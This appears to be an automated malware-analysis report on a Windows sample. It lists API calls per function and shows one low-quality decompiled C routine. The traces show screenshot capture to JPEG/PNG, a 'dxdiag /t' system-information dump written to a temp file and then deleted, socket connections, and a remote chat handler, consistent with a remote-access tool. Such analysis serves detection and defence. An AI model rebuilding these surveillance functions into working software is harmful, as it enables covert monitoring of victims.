                                              • Part of subcall function 013C27F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 013C2841
                                              • Part of subcall function 013C27F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 013C284A
                                              • Part of subcall function 013C2718: _itoa.MSVCRT ref: 013C2736
                                              • Part of subcall function 013C2718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,013BCC05,?,00000000,013CB310,00000000,013CB310,?), ref: 013C274A
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,013CC0C8,Function_0001B310,00000000,00000000,?,?,?,013CBF08), ref: 013BF7EF
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,013CBF08), ref: 013BF7FF
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,013CBF08), ref: 013BF80F
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,013CBF08), ref: 013BF81F
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,013CBF08), ref: 013BF82C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 013BF83C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BF84C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 013BF86D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF879
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF882
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF88E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF89A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF8A6
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF8B2
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF8BE
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BF856
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 013BF900
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BF909
                                              • Part of subcall function 013BF984: GdipDisposeImage.GDIPLUS(?,013C0AE2), ref: 013BF98D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                            • String ID: image/jpeg
                                            • API String ID: 1042780377-3785015651
                                            • Opcode ID: 485602ba61ce58741df0bd6438dd366382f64ef0634f09e9ab9e7b58ef2dbbc3
                                            • Instruction ID: 16a5293d481a1b87069cfdc6d4c22498d173304150de14137de18550a2c60f17
                                            • Opcode Fuzzy Hash: 485602ba61ce58741df0bd6438dd366382f64ef0634f09e9ab9e7b58ef2dbbc3
                                            • Instruction Fuzzy Hash: 10916172900119AFDB10EFA4EC99EEFBB7CEF54705F004469F906A7144EB71AA08CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C093F, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C0D89,?,png,013CBCB0), ref: 013C0958
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013C0963
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C096E
                                              • Part of subcall function 013BFA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 013BFA5C
                                              • Part of subcall function 013BFA46: CreateCompatibleDC.GDI32(00000000), ref: 013BFA68
                                              • Part of subcall function 013BFA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013BFD20
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013C0989
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013C0993
                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 013C099A
                                              • Part of subcall function 013BF925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 013BF942
                                              • Part of subcall function 013BFE07: malloc.MSVCRT ref: 013BFE2E
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 013C09C2
                                              • Part of subcall function 013C0AF7: GdipSaveImageToFile.GDIPLUS(?,013C09D1,?,00000000,00000000,?,013C09D1,00000000), ref: 013C0B09
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 013C09DF
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013C09F5
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013C0A02
                                              • Part of subcall function 013C2DDF: CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013C0A1B
                                            • DeleteFileW.KERNEL32(00000000), ref: 013C0A22
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013C0A2F
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013C0A38
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013C0A4D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013C0A57
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C0D89,?,dat,?,00000000), ref: 013C0A7F
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013C0A8A
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C0A98
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013C0AA1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C0AB1
                                              • Part of subcall function 013C2E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,?,?,013C1AD6), ref: 013C2E5A
                                              • Part of subcall function 013C2E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C1AD6), ref: 013C2E64
                                              • Part of subcall function 013C2E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C2E78
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C0AC2
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0ACB
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0AD4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0AE5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C0AEE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                            • String ID: dat$image/png$png
                                            • API String ID: 3276867942-186023265
                                            • Opcode ID: ead67ae5fc0dd1ad53597d733c5847b93c2762f40e2a3d0d16ea27e66cd4ba56
                                            • Instruction ID: 63cb6db15f96971e15bafbbb01d3be7ab6c2a46127919e16458dc2ca36590266
                                            • Opcode Fuzzy Hash: ead67ae5fc0dd1ad53597d733c5847b93c2762f40e2a3d0d16ea27e66cd4ba56
                                            • Instruction Fuzzy Hash: F041C77290010AAFCB15EBA4ED999EE7B7CAF64705F504129F507A6094EF747F08CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BE927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _wgetenv.MSVCRT ref: 013BE93E
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 013BE949
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013BE954
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BE95F
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 013BE976
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 013BE980
                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 013BE992
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 013BE99B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 013BE9A8
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 013BE9B7
                                              • Part of subcall function 013C2DDF: CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • Sleep.KERNEL32(00000064,00000000,00000000), ref: 013BE9C7
                                            • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 013BE9D1
                                            • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 013BE9E6
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013BE9F7
                                            • DeleteFileW.KERNEL32(00000000), ref: 013BE9FE
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,013CB310,?), ref: 013BEA3C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 013BEA46
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 013BEA5E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BEA77
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BEA80
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BEA89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                            • API String ID: 1966616101-2001430897
                                            • Opcode ID: 8f231b3e31b0666079afebdc9194102eca7fa4055d4e194b3f40952f53890d85
                                            • Instruction ID: ca55f1498131484fb68e8b9aa44d7a7bc05661a722a82fbbfff52611789a25ad
                                            • Opcode Fuzzy Hash: 8f231b3e31b0666079afebdc9194102eca7fa4055d4e194b3f40952f53890d85
                                            • Instruction Fuzzy Hash: D9414372A00109AFCB14EBB4E999DEEB77CEF64709F500119F902A3145EB757E09CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 34%
                                            			E013B295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E013C29EB(_t107,  &_v28,  &_v76,  &E013CB310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E013B180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E013B6DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E013B17DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x13cb794 = E013B7033(_t62, "DisplayMessage");
					 *0x13cb798 = E013B7033(_t62, "GetMessage");
					_t41 = E013B7033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x13cb79c = _t41;
					 *0x13cb790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E013B20C2(_t95, 0x74, 0x13cb738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x13cb798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E013B20C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E013C2881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E013B180C( &_v28, _t109, 0));
				_t51 =  *0x13cb794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E013C2855( &_v60, _t104 - 0x10,  &_v60);
				E013B20C2(_t95, 0x3b, 0x13c576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                            0x013b295e
                                            0x013b2967
                                            0x013b2971
                                            0x013b297a
                                            0x013b2983
                                            0x013b299b
                                            0x013b29ab
                                            0x013b29ba
                                            0x013b29c4
                                            0x013b29c9
                                            0x013b29cc
                                            0x013b29cf
                                            0x013b2a80
                                            0x013b2a87
                                            0x013b2a93
                                            0x013b2a96
                                            0x013b2a98
                                            0x013b2b33
                                            0x013b2b36
                                            0x013b2b3e
                                            0x013b2b47
                                            0x013b2b4f
                                            0x013b2b53
                                            0x013b2b53
                                            0x013b2aaf
                                            0x013b2abf
                                            0x013b2ac4
                                            0x013b2ac9
                                            0x013b2acc
                                            0x013b2ad3
                                            0x013b2adf
                                            0x013b2ae9
                                            0x013b2aee
                                            0x013b2af7
                                            0x013b2afe
                                            0x013b2b05
                                            0x013b2b08
                                            0x013b2b0a
                                            0x013b2b17
                                            0x013b2b21
                                            0x013b2b2b
                                            0x013b2b2b
                                            0x00000000
                                            0x013b2b08
                                            0x013b29d5
                                            0x013b29d6
                                            0x00000000
                                            0x00000000
                                            0x013b29ec
                                            0x013b29f5
                                            0x013b29fc
                                            0x013b2a08
                                            0x013b2a10
                                            0x00000000
                                            0x00000000
                                            0x013b2a22
                                            0x013b2a32
                                            0x013b2a3d
                                            0x013b2a45
                                            0x00000000
                                            0x013b2a4b
                                            0x013b2a72
                                            0x00000000
                                            0x00000000
                                            0x013b2a78
                                            0x013b2a60
                                            0x013b2a6a
                                            0x00000000

                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B2971
                                            • SetEvent.KERNEL32(?), ref: 013B297A
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B2983
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013B299B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013B29AB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B29BA
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B29F5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B2A08
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C576C,?), ref: 013B2A22
                                              • Part of subcall function 013C2855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2860
                                              • Part of subcall function 013C2855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C286C
                                              • Part of subcall function 013C2855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2876
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 013B2A45
                                            • GetMessageA.USER32 ref: 013B2A52
                                            • TranslateMessage.USER32(?), ref: 013B2A60
                                            • DispatchMessageA.USER32 ref: 013B2A6A
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B2A87
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CB738,00000000,DisplayMessage), ref: 013B2ADF
                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 013B2AF1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 013B2B17
                                            • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 013B2B2B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2B3E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2B47
                                              • Part of subcall function 013C2881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBA38,013CBCB0,00000000,013B903C,013C40D8,00000000,0000000B), ref: 013C288D
                                              • Part of subcall function 013C2881: ??2@YAPAXI@Z.MSVCRT ref: 013C289B
                                              • Part of subcall function 013C2881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28BD
